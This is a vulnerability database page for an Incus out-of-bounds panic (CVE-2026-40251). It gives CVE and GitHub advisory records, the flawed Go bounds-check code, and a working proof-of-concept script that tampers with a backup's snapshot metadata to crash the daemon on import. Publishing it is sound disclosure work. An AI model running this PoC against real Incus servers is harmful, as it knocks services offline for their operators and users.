Vulnerability-Lookup

CVE-2026-40251 (GCVE-0-2026-40251)

Vulnerability from cvelistv5 – Published: 2026-05-06 20:40 – Updated: 2026-05-07 13:52

Title

Incus out-of-bounds panic in snapshot metadata handling allows denial of service

Summary

Incus is a system container and virtual machine manager. In versions before 7.0.0, missing validation logic in the storage volume import logic allows an authenticated user with access to the storage volume feature to cause the Incus daemon to crash. The backup restore subsystem contains an out-of-bounds panic vulnerability caused by an invalid bounds check when indexing snapshot metadata arrays, and the same flawed pattern also appears in the migration path. When iterating through physical snapshots provided in a backup archive, the loop uses the index to look up corresponding metadata in the parsed `Config.Snapshots` and `Config.VolumeSnapshots` slices. The guard condition `len(slice) >= i-1` is incorrect because it can still evaluate to true when the subsequent slice[i] access is out of bounds. An attacker can submit a backup archive that contains physical snapshot directories while supplying a tampered `index.yaml` with an empty or truncated snapshot metadata array, causing the daemon to index beyond the end of the metadata slice and crash. Repeated use of this issue can be used to keep Incus offline, causing a denial of service. This issue is fixed in version 7.0.0.

Severity ?

7.1 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE

CWE-129 - Improper Validation of Array Index

Assigner

GitHub_M

References

URL

Tags

	https://github.com/lxc/incus/security/advisories/…	x_refsource_CONFIRM
	https://github.com/lxc/incus/blob/v6.22.0/interna…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	lxc	incus	Affected: < 7.0.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-40251",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-07T13:52:30.597450Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-07T13:52:33.513Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "incus",
          "vendor": "lxc",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 7.0.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Incus is a system container and virtual machine manager. In versions before 7.0.0, missing validation logic in the storage volume import logic allows an authenticated user with access to the storage volume feature to cause the Incus daemon to crash. The backup restore subsystem contains an out-of-bounds panic vulnerability caused by an invalid bounds check when indexing snapshot metadata arrays, and the same flawed pattern also appears in the migration path. When iterating through physical snapshots provided in a backup archive, the loop uses the index to look up corresponding metadata in the parsed `Config.Snapshots` and `Config.VolumeSnapshots` slices. The guard condition `len(slice) \u003e= i-1` is incorrect because it can still evaluate to true when the subsequent slice[i] access is out of bounds.\n\nAn attacker can submit a backup archive that contains physical snapshot directories while supplying a tampered `index.yaml` with an empty or truncated snapshot metadata array, causing the daemon to index beyond the end of the metadata slice and crash. Repeated use of this issue can be used to keep Incus offline, causing a denial of service. This issue is fixed in version 7.0.0."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-129",
              "description": "CWE-129: Improper Validation of Array Index",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-06T20:40:10.930Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6"
        },
        {
          "name": "https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go"
        }
      ],
      "source": {
        "advisory": "GHSA-4m88-wxj4-9qj6",
        "discovery": "UNKNOWN"
      },
      "title": "Incus out-of-bounds panic in snapshot metadata handling allows denial of service"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40251",
    "datePublished": "2026-05-06T20:40:10.930Z",
    "dateReserved": "2026-04-10T17:31:45.786Z",
    "dateUpdated": "2026-05-07T13:52:33.513Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-40251",
      "date": "2026-05-07",
      "epss": "0.00042",
      "percentile": "0.12575"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40251\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-06T21:16:01.210\",\"lastModified\":\"2026-05-07T17:06:42.753\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Incus is a system container and virtual machine manager. In versions before 7.0.0, missing validation logic in the storage volume import logic allows an authenticated user with access to the storage volume feature to cause the Incus daemon to crash. The backup restore subsystem contains an out-of-bounds panic vulnerability caused by an invalid bounds check when indexing snapshot metadata arrays, and the same flawed pattern also appears in the migration path. When iterating through physical snapshots provided in a backup archive, the loop uses the index to look up corresponding metadata in the parsed `Config.Snapshots` and `Config.VolumeSnapshots` slices. The guard condition `len(slice) \u003e= i-1` is incorrect because it can still evaluate to true when the subsequent slice[i] access is out of bounds.\\n\\nAn attacker can submit a backup archive that contains physical snapshot directories while supplying a tampered `index.yaml` with an empty or truncated snapshot metadata array, causing the daemon to index beyond the end of the metadata slice and crash. Repeated use of this issue can be used to keep Incus offline, causing a denial of service. This issue is fixed in version 7.0.0.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-129\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"7.0.0\",\"matchCriteriaId\":\"CF8EBB4B-C1F0-44C5-B063-9CF8EB6E0972\"}]}]}],\"references\":[{\"url\":\"https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40251\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-07T13:52:30.597450Z\"}}}], \"references\": [{\"url\": \"https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-07T13:52:19.761Z\"}}], \"cna\": {\"title\": \"Incus out-of-bounds panic in snapshot metadata handling allows denial of service\", \"source\": {\"advisory\": \"GHSA-4m88-wxj4-9qj6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"lxc\", \"product\": \"incus\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 7.0.0\"}]}], \"references\": [{\"url\": \"https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6\", \"name\": \"https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go\", \"name\": \"https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Incus is a system container and virtual machine manager. In versions before 7.0.0, missing validation logic in the storage volume import logic allows an authenticated user with access to the storage volume feature to cause the Incus daemon to crash. The backup restore subsystem contains an out-of-bounds panic vulnerability caused by an invalid bounds check when indexing snapshot metadata arrays, and the same flawed pattern also appears in the migration path. When iterating through physical snapshots provided in a backup archive, the loop uses the index to look up corresponding metadata in the parsed `Config.Snapshots` and `Config.VolumeSnapshots` slices. The guard condition `len(slice) \u003e= i-1` is incorrect because it can still evaluate to true when the subsequent slice[i] access is out of bounds.\\n\\nAn attacker can submit a backup archive that contains physical snapshot directories while supplying a tampered `index.yaml` with an empty or truncated snapshot metadata array, causing the daemon to index beyond the end of the metadata slice and crash. Repeated use of this issue can be used to keep Incus offline, causing a denial of service. This issue is fixed in version 7.0.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-129\", \"description\": \"CWE-129: Improper Validation of Array Index\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-06T20:40:10.930Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-40251\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-07T13:52:33.513Z\", \"dateReserved\": \"2026-04-10T17:31:45.786Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-06T20:40:10.930Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-4M88-WXJ4-9QJ6

Vulnerability from github – Published: 2026-05-04 19:16 – Updated: 2026-05-04 19:16

Summary

Incus Vulnerable to Panic via Snapshot Bounds Check

Details

Summary

Missing validation logic in the storage volume import logic allows an authenticated user with access to Incus' storage volume feature to cause the Incus daemon to crash. Repeated use of this issue can be used to keep Incus offline causing a denial of service.

Details

The backup restore subsystem contains an out-of-bounds panic vulnerability caused by an invalid bounds check when indexing snapshot metadata arrays. The same flawed pattern also appears in the migration path.

When iterating through physical snapshots provided in a backup archive, the loop uses the index i to look up corresponding metadata in the parsed Config.Snapshots and Config.VolumeSnapshots slices. To ensure that the metadata slice is long enough, the code uses the guard condition len(slice) >= i-1. This check is incorrect because it can still evaluate to true when the subsequent slice[i] access is out of bounds, including when i >= len(slice), triggering a runtime panic.

An attacker can trigger this by submitting a backup archive that contains physical snapshot directories, which drive the loop variable i, while supplying a tampered index.yaml with an empty or truncated snapshot metadata array. This causes the daemon to index beyond the end of the metadata slice and crash, resulting in immediate denial of service on the node.

Affected File: https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go

Affected Code:

func (b *backend) CreateInstanceFromBackup(srcBackup backup.Info, srcData io.ReadSeeker, op *operations.Operation) (func(instance.Instance) error, revert.Hook, error) {
    [...]
    postHook := func(inst instance.Instance) error {
        [...]
        for i, backupFileSnap := range srcBackup.Snapshots {
            var volumeSnapDescription string
            var volumeSnapConfig map[string]string
            var volumeSnapExpiryDate time.Time
            var volumeSnapCreationDate time.Time

            // Check if snapshot volume config is available for restore and matches snapshot name.
            if srcBackup.Config != nil {
                if len(srcBackup.Config.Snapshots) >= i-1 && srcBackup.Config.Snapshots[i] != nil && srcBackup.Config.Snapshots[i].Name == backupFileSnap {
                    // Use instance snapshot's creation date if snap info available.
                    volumeSnapCreationDate = srcBackup.Config.Snapshots[i].CreatedAt
                }

                if len(srcBackup.Config.VolumeSnapshots) >= i-1 && srcBackup.Config.VolumeSnapshots[i] != nil && srcBackup.Config.VolumeSnapshots[i].Name == backupFileSnap {
                    // If the backup restore interface provides volume snapshot config use it,
                    // otherwise use default volume config for the storage pool.
                    volumeSnapDescription = srcBackup.Config.VolumeSnapshots[i].Description
                    volumeSnapConfig = srcBackup.Config.VolumeSnapshots[i].Config

                    if srcBackup.Config.VolumeSnapshots[i].ExpiresAt != nil {
                        volumeSnapExpiryDate = *srcBackup.Config.VolumeSnapshots[i].ExpiresAt
                    }

                    // Use volume's creation date if available.
                    if !srcBackup.Config.VolumeSnapshots[i].CreatedAt.IsZero() {
                        volumeSnapCreationDate = srcBackup.Config.VolumeSnapshots[i].CreatedAt
                    }
                }
            }

            [...]
        }
        [...]
    }
    [...]
}

[...]

func (b *backend) CreateInstanceFromMigration(inst instance.Instance, conn io.ReadWriteCloser, args localMigration.VolumeTargetArgs, op *operations.Operation) error {
    [...]
    if !isRemoteClusterMove || args.StoragePool != "" {
        for i, snapshot := range args.Snapshots {
            snapName := snapshot.GetName()
            newSnapshotName := drivers.GetSnapshotVolumeName(inst.Name(), snapName)
            snapConfig := vol.Config()           // Use parent volume config by default.
            snapDescription := volumeDescription // Use parent volume description by default.
            snapExpiryDate := time.Time{}
            snapCreationDate := time.Time{}

            // If the source snapshot config is available, use that.
            if srcInfo != nil && srcInfo.Config != nil {
                if len(srcInfo.Config.Snapshots) >= i-1 && srcInfo.Config.Snapshots[i] != nil && srcInfo.Config.Snapshots[i].Name == snapName {
                    // Use instance snapshot's creation date if snap info available.
                    snapCreationDate = srcInfo.Config.Snapshots[i].CreatedAt
                }

                if len(srcInfo.Config.VolumeSnapshots) >= i-1 && srcInfo.Config.VolumeSnapshots[i] != nil && srcInfo.Config.VolumeSnapshots[i].Name == snapName {
                    // Check if snapshot volume config is available then use it.
                    snapDescription = srcInfo.Config.VolumeSnapshots[i].Description
                    snapConfig = srcInfo.Config.VolumeSnapshots[i].Config

                    if srcInfo.Config.VolumeSnapshots[i].ExpiresAt != nil {
                        snapExpiryDate = *srcInfo.Config.VolumeSnapshots[i].ExpiresAt
                    }

                    // Use volume's creation date if available.
                    if !srcInfo.Config.VolumeSnapshots[i].CreatedAt.IsZero() {
                        snapCreationDate = srcInfo.Config.VolumeSnapshots[i].CreatedAt
                    }
                }
            }

            [...]
        }
    }
    [...]
}

PoC

The following PoC demonstrates that a tampered instance backup archive containing physical snapshot directories but an empty snapshot metadata array can trigger an out-of-bounds panic during restore.

Step 1: Generate a valid backup and tamper with its snapshot metadata

From an Incus client with access to the target server, create a minimal instance, create a snapshot, export it, and then modify the exported index.yaml so that the physical snapshot directory remains present while the nested snapshot metadata arrays are emptied.

Commands:

cat <<'EOF' > poc_snapshot_bounds.sh
#!/bin/bash
set -e

BASE_NAME="base-$(date +%s)"
PANIC_NAME="panic-$(date +%s)"

incus init images:alpine/edge "$BASE_NAME" --project default
incus snapshot create "$BASE_NAME" snap0 --project default
incus export "$BASE_NAME" valid_snapshot_base.tar.gz --project default

mkdir -p extract_snapshot_bounds
tar -xzf valid_snapshot_base.tar.gz -C extract_snapshot_bounds/
chmod -R u+rwX extract_snapshot_bounds/

python3 -c "
import os
import sys

base = '$BASE_NAME'
panic = '$PANIC_NAME'

with open('extract_snapshot_bounds/backup/index.yaml', 'r') as f:
    lines = f.read().splitlines()

out = []
in_skip = False
skip_indent = 0

for line in lines:
    line = line.replace(base, panic)
    indent = len(line) - len(line.lstrip())

    if in_skip:
        if not line.strip():
            continue
        if indent > skip_indent or (indent == skip_indent and line.lstrip().startswith('-')):
            continue
        else:
            in_skip = False

    if indent > 0 and (line.lstrip().startswith('snapshots:') or line.lstrip().startswith('volume_snapshots:')):
        out.append(line.split(':')[0] + ': []')
        in_skip = True
        skip_indent = indent
        continue

    out.append(line)

with open('extract_snapshot_bounds/backup/index.yaml', 'w') as f:
    f.write('\n'.join(out))
"

cd extract_snapshot_bounds/
tar -czf ../exploit_snapshot_bounds_panic.tar.gz backup/
cd ..

rm -rf extract_snapshot_bounds/ valid_snapshot_base.tar.gz
echo "[+] PoC Tarball Created: exploit_snapshot_bounds_panic.tar.gz"
EOF

bash poc_snapshot_bounds.sh

Result:

[+] PoC Tarball Created: exploit_snapshot_bounds_panic.tar.gz

Step 2: Trigger the vulnerable restore path

From the same Incus client, import the crafted archive.

Command:

incus import exploit_snapshot_bounds_panic.tar.gz --project default

Result:

Error: websocket: close 1006 (abnormal closure): unexpected EOF

Credit

This issue was discovered and reported by the team at 7asecurity (https://7asecurity.com/)

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/lxc/incus/v6/cmd/incusd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40251"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-125"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T19:16:25Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nMissing validation logic in the storage volume import logic allows an authenticated user with access to Incus\u0027 storage volume feature to cause the Incus daemon to crash. Repeated use of this issue can be used to keep Incus offline causing a denial of service.\n\n### Details\nThe backup restore subsystem contains an out-of-bounds panic vulnerability caused by an invalid bounds check when indexing snapshot metadata arrays. The same flawed pattern also appears in the migration path.\n\nWhen iterating through physical snapshots provided in a backup archive, the loop uses the index i to look up corresponding metadata in the parsed Config.Snapshots and Config.VolumeSnapshots slices. To ensure that the metadata slice is long enough, the code uses the guard condition len(slice) \u003e= i-1. This check is incorrect because it can still evaluate to true when the subsequent slice[i] access is out of bounds, including when i \u003e= len(slice), triggering a runtime panic.\n\nAn attacker can trigger this by submitting a backup archive that contains physical snapshot directories, which drive the loop variable i, while supplying a tampered index.yaml with an empty or truncated snapshot metadata array. This causes the daemon to index beyond the end of the metadata slice and crash, resulting in immediate denial of service on the node.\n\nAffected File:\nhttps://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go \n\nAffected Code:\n```\nfunc (b *backend) CreateInstanceFromBackup(srcBackup backup.Info, srcData io.ReadSeeker, op *operations.Operation) (func(instance.Instance) error, revert.Hook, error) {\n    [...]\n    postHook := func(inst instance.Instance) error {\n        [...]\n        for i, backupFileSnap := range srcBackup.Snapshots {\n            var volumeSnapDescription string\n            var volumeSnapConfig map[string]string\n            var volumeSnapExpiryDate time.Time\n            var volumeSnapCreationDate time.Time\n\n            // Check if snapshot volume config is available for restore and matches snapshot name.\n            if srcBackup.Config != nil {\n                if len(srcBackup.Config.Snapshots) \u003e= i-1 \u0026\u0026 srcBackup.Config.Snapshots[i] != nil \u0026\u0026 srcBackup.Config.Snapshots[i].Name == backupFileSnap {\n                    // Use instance snapshot\u0027s creation date if snap info available.\n                    volumeSnapCreationDate = srcBackup.Config.Snapshots[i].CreatedAt\n                }\n\n                if len(srcBackup.Config.VolumeSnapshots) \u003e= i-1 \u0026\u0026 srcBackup.Config.VolumeSnapshots[i] != nil \u0026\u0026 srcBackup.Config.VolumeSnapshots[i].Name == backupFileSnap {\n                    // If the backup restore interface provides volume snapshot config use it,\n                    // otherwise use default volume config for the storage pool.\n                    volumeSnapDescription = srcBackup.Config.VolumeSnapshots[i].Description\n                    volumeSnapConfig = srcBackup.Config.VolumeSnapshots[i].Config\n\n                    if srcBackup.Config.VolumeSnapshots[i].ExpiresAt != nil {\n                        volumeSnapExpiryDate = *srcBackup.Config.VolumeSnapshots[i].ExpiresAt\n                    }\n\n                    // Use volume\u0027s creation date if available.\n                    if !srcBackup.Config.VolumeSnapshots[i].CreatedAt.IsZero() {\n                        volumeSnapCreationDate = srcBackup.Config.VolumeSnapshots[i].CreatedAt\n                    }\n                }\n            }\n\n            [...]\n        }\n        [...]\n    }\n    [...]\n}\n\n[...]\n\nfunc (b *backend) CreateInstanceFromMigration(inst instance.Instance, conn io.ReadWriteCloser, args localMigration.VolumeTargetArgs, op *operations.Operation) error {\n    [...]\n    if !isRemoteClusterMove || args.StoragePool != \"\" {\n        for i, snapshot := range args.Snapshots {\n            snapName := snapshot.GetName()\n            newSnapshotName := drivers.GetSnapshotVolumeName(inst.Name(), snapName)\n            snapConfig := vol.Config()           // Use parent volume config by default.\n            snapDescription := volumeDescription // Use parent volume description by default.\n            snapExpiryDate := time.Time{}\n            snapCreationDate := time.Time{}\n\n            // If the source snapshot config is available, use that.\n            if srcInfo != nil \u0026\u0026 srcInfo.Config != nil {\n                if len(srcInfo.Config.Snapshots) \u003e= i-1 \u0026\u0026 srcInfo.Config.Snapshots[i] != nil \u0026\u0026 srcInfo.Config.Snapshots[i].Name == snapName {\n                    // Use instance snapshot\u0027s creation date if snap info available.\n                    snapCreationDate = srcInfo.Config.Snapshots[i].CreatedAt\n                }\n\n                if len(srcInfo.Config.VolumeSnapshots) \u003e= i-1 \u0026\u0026 srcInfo.Config.VolumeSnapshots[i] != nil \u0026\u0026 srcInfo.Config.VolumeSnapshots[i].Name == snapName {\n                    // Check if snapshot volume config is available then use it.\n                    snapDescription = srcInfo.Config.VolumeSnapshots[i].Description\n                    snapConfig = srcInfo.Config.VolumeSnapshots[i].Config\n\n                    if srcInfo.Config.VolumeSnapshots[i].ExpiresAt != nil {\n                        snapExpiryDate = *srcInfo.Config.VolumeSnapshots[i].ExpiresAt\n                    }\n\n                    // Use volume\u0027s creation date if available.\n                    if !srcInfo.Config.VolumeSnapshots[i].CreatedAt.IsZero() {\n                        snapCreationDate = srcInfo.Config.VolumeSnapshots[i].CreatedAt\n                    }\n                }\n            }\n\n            [...]\n        }\n    }\n    [...]\n}\n```\n\n### PoC\n\nThe following PoC demonstrates that a tampered instance backup archive containing physical snapshot directories but an empty snapshot metadata array can trigger an out-of-bounds panic during restore.\n\nStep 1: Generate a valid backup and tamper with its snapshot metadata\n\nFrom an Incus client with access to the target server, create a minimal instance, create a snapshot, export it, and then modify the exported index.yaml so that the physical snapshot directory remains present while the nested snapshot metadata arrays are emptied.\n\nCommands:\n```\ncat \u003c\u003c\u0027EOF\u0027 \u003e poc_snapshot_bounds.sh\n#!/bin/bash\nset -e\n\nBASE_NAME=\"base-$(date +%s)\"\nPANIC_NAME=\"panic-$(date +%s)\"\n\nincus init images:alpine/edge \"$BASE_NAME\" --project default\nincus snapshot create \"$BASE_NAME\" snap0 --project default\nincus export \"$BASE_NAME\" valid_snapshot_base.tar.gz --project default\n\nmkdir -p extract_snapshot_bounds\ntar -xzf valid_snapshot_base.tar.gz -C extract_snapshot_bounds/\nchmod -R u+rwX extract_snapshot_bounds/\n\npython3 -c \"\nimport os\nimport sys\n\nbase = \u0027$BASE_NAME\u0027\npanic = \u0027$PANIC_NAME\u0027\n\nwith open(\u0027extract_snapshot_bounds/backup/index.yaml\u0027, \u0027r\u0027) as f:\n    lines = f.read().splitlines()\n\nout = []\nin_skip = False\nskip_indent = 0\n\nfor line in lines:\n    line = line.replace(base, panic)\n    indent = len(line) - len(line.lstrip())\n\n    if in_skip:\n        if not line.strip():\n            continue\n        if indent \u003e skip_indent or (indent == skip_indent and line.lstrip().startswith(\u0027-\u0027)):\n            continue\n        else:\n            in_skip = False\n\n    if indent \u003e 0 and (line.lstrip().startswith(\u0027snapshots:\u0027) or line.lstrip().startswith(\u0027volume_snapshots:\u0027)):\n        out.append(line.split(\u0027:\u0027)[0] + \u0027: []\u0027)\n        in_skip = True\n        skip_indent = indent\n        continue\n\n    out.append(line)\n\nwith open(\u0027extract_snapshot_bounds/backup/index.yaml\u0027, \u0027w\u0027) as f:\n    f.write(\u0027\\n\u0027.join(out))\n\"\n\ncd extract_snapshot_bounds/\ntar -czf ../exploit_snapshot_bounds_panic.tar.gz backup/\ncd ..\n\nrm -rf extract_snapshot_bounds/ valid_snapshot_base.tar.gz\necho \"[+] PoC Tarball Created: exploit_snapshot_bounds_panic.tar.gz\"\nEOF\n\nbash poc_snapshot_bounds.sh\n```\n\nResult:\n```\n[+] PoC Tarball Created: exploit_snapshot_bounds_panic.tar.gz\n```\n\nStep 2: Trigger the vulnerable restore path\n\nFrom the same Incus client, import the crafted archive.\n\nCommand:\n```\nincus import exploit_snapshot_bounds_panic.tar.gz --project default\n```\n\nResult:\n```\nError: websocket: close 1006 (abnormal closure): unexpected EOF\n```\n\n### Credit\nThis issue was discovered and reported by the team at 7asecurity (https://7asecurity.com/)",
  "id": "GHSA-4m88-wxj4-9qj6",
  "modified": "2026-05-04T19:16:25Z",
  "published": "2026-05-04T19:16:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lxc/incus"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
